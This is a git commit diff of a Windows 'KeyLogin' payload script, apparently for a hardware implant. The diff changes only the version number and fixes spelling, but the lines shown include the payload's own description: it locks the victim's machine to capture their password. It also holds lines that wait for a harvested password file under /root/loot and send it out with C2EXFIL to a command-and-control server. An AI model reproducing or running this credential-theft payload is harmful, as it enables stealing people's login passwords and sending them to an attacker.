Update and rename payload.txt.txt to payload.txt
parent
744b1828f8
commit
a4d572a1ac
|
@ -1,5 +1,5 @@
|
||||||
###############################KeyLogin#####################################
|
###############################KeyLogin#####################################
|
||||||
# Version 1.0
|
# Version 1.1
|
||||||
# OS: Windows
|
# OS: Windows
|
||||||
# Author: 0iphor13
|
# Author: 0iphor13
|
||||||
# Discription: This extremely simple payload will lock the targets machine and will wait for it to insert the password.
|
# Discription: This extremely simple payload will lock the targets machine and will wait for it to insert the password.
|
||||||
|
@ -33,7 +33,7 @@ while [ ! -f /root/loot/win-pass.txt ]; do sleep 2; done
|
||||||
|
|
||||||
C2EXFIL /root/loot/win-pass.txt
|
C2EXFIL /root/loot/win-pass.txt
|
||||||
Q DELAY 1000
|
Q DELAY 1000
|
||||||
C2NOTIFY INFO 'User Credentials Recieved!'
|
C2NOTIFY INFO 'User Credentials Received!'
|
||||||
|
|
||||||
#You may want to delete or disable to payload after execution to avoid endless logout processes
|
#You may want to delete or disable to payload after execution to avoid endless logout processes
|
||||||
#rm /root/udisk/payloads/KeyLogin.txt
|
#rm /root/udisk/payloads/KeyLogin.txt
|
Loading…
Reference in New Issue